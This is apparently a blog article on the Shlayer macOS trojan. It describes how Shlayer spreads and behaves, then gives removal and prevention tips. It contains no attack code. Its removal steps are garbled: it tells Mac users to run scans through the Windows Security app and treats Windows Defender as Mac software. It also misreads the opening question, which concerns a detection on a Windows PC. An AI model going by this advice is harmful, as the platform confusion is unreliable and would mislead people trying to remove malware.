Shlayer: The most common macOS malware and how to get rid of it


How can I permanently remove the persistent Backdoor:MacOS/Shlayer!rfn malware from my iCloudDriveAppData folder? Windows Defender detects and deletes it repeatedly, but it keeps reappearing. Is this a false positive or a serious threat?


How to get rid of the Shlayer Trojan on your Mac

If you are a Mac user, you may have encountered a persistent malware threat called Backdoor:MacOS/Shlayer!rfn. This is a trojan that disguises itself as a legitimate Adobe Flash Player update and tries to install additional unwanted applications on your system. It can also provide backdoor access to attackers who can steal your data or compromise your security. Windows Defender, the built-in antivirus software on Windows 10, can detect and remove this threat, but it may not be enough to completely eliminate it. In this article, we will explain how this malware works, why it is so hard to get rid of, and what you can do to protect your Mac from it.

Shlayer is a malware family that has been around since 2018 and is the most common threat on the macOS platform. It is distributed through various channels, such as fake software updates, malicious ads, compromised websites, or bundled with pirated software. Once the user downloads and runs the fake Flash Player installer, Shlayer executes a shell script that downloads and installs additional malware, such as Bundlore, Pirrit, Geonie, and others. These malware can perform various malicious activities, such as displaying intrusive ads, hijacking browser settings, collecting personal information, or downloading more malware.

Shlayer is not only annoying, but also dangerous. It can intercept encrypted web traffic, including HTTPS-enabled sites, and inject its own ads, making fraudulent ad money for the operators. It can also expose your Mac to more serious threats, such as ransomware, spyware, or keyloggers. Moreover, Shlayer can evade detection and removal by using various techniques, such as obfuscation, encryption, code signing, or persistence mechanisms. For example, some variants of Shlayer are written in Python, which is unusual for macOS malware, and use a byte shift algorithm to encrypt their data. Some variants also use legitimate certificates to sign their code, which can bypass some security checks.

How can I remove Shlayer from my Mac?

If you suspect that your Mac is infected with Shlayer, you should take immediate action to remove it. Windows Defender can help you with that, but you may need to do some extra steps to ensure that the malware is completely gone. Here are some general steps that you can follow:

  • Update your Windows Defender definitions and run a full scan on your Mac. You can do this by opening the Windows Security app, clicking on Virus & threat protection, and then Scan options. Choose Full scan and then Scan now. This will scan your entire system for any threats and remove them automatically.
  • Check your applications folder and trash bin for any suspicious or unknown apps that you did not install. If you find any, drag them to the trash and empty it. You can also use a third-party app uninstaller to remove any leftover files or folders associated with the app.
  • Check your browser extensions and settings for any unwanted changes. If you see any unfamiliar extensions, disable or remove them. If your homepage, search engine, or new tab page have been changed, restore them to your preferred ones. You can also clear your browser cache and cookies to get rid of any traces of the malware.
  • Check your system preferences and startup items for any malicious entries. If you see any, disable or delete them. You can also use a tool like Malwarebytes or CleanMyMac to scan and clean your system for any malware remnants or junk files.
  • Restart your Mac and run another scan with Windows Defender to make sure that the malware is gone. If you still see any signs of infection, you may need to contact a professional or reinstall your macOS.
  • How can I prevent Shlayer from infecting my Mac again?

    The best way to prevent Shlayer or any other malware from infecting your Mac is to practice good security habits. Here are some tips that you can follow:

  • Avoid downloading or installing software from untrusted sources. Always get your software from the official website or the App Store. If you need to update your software, use the built-in update feature or go to the developer’s website. Do not trust pop-ups or notifications that claim that your software is outdated or needs to be updated.
  • Be careful when clicking on links or ads on the web. Some of them may lead you to malicious websites or downloads. Use a reputable ad blocker or browser security extension to block or warn you about potentially harmful content. Also, check the URL and the certificate of the website before entering any sensitive information or downloading anything.
  • Keep your macOS and Windows Defender updated. Updates often contain security patches and improvements that can protect your system from new threats. You can enable automatic updates or check for updates manually on a regular basis.
  • Use a strong and unique password for your Mac and your online accounts. Do not use the same password for different sites or services. Use a password manager to generate and store your passwords securely. Also, enable two-factor authentication whenever possible to add an extra layer of security to your accounts.
  • Backup your data regularly. In case your Mac gets infected or compromised, you can restore your data from a backup. You can use an external hard drive, a cloud service, or a backup software to backup your data. Make sure that your backup is encrypted and protected with a password.
  • Shlayer is a persistent and dangerous malware that can infect your Mac and cause various problems. Windows Defender can help you remove it, but you may need to do some additional steps to ensure that your system is clean and safe. You can also prevent Shlayer from infecting your Mac again by following some simple security tips. Stay safe and enjoy your Mac!

    — : [Shlayer Trojan attacks one in ten macOS users | Securelist] : [Backdoor:MacOS/Shlayer!rfn threat description – Microsoft Security Intelligence] :

[A software bug let malware bypass macOS’ security defenses]

Leave a Reply

Your email address will not be published. Required fields are marked *

Privacy Terms Contacts About Us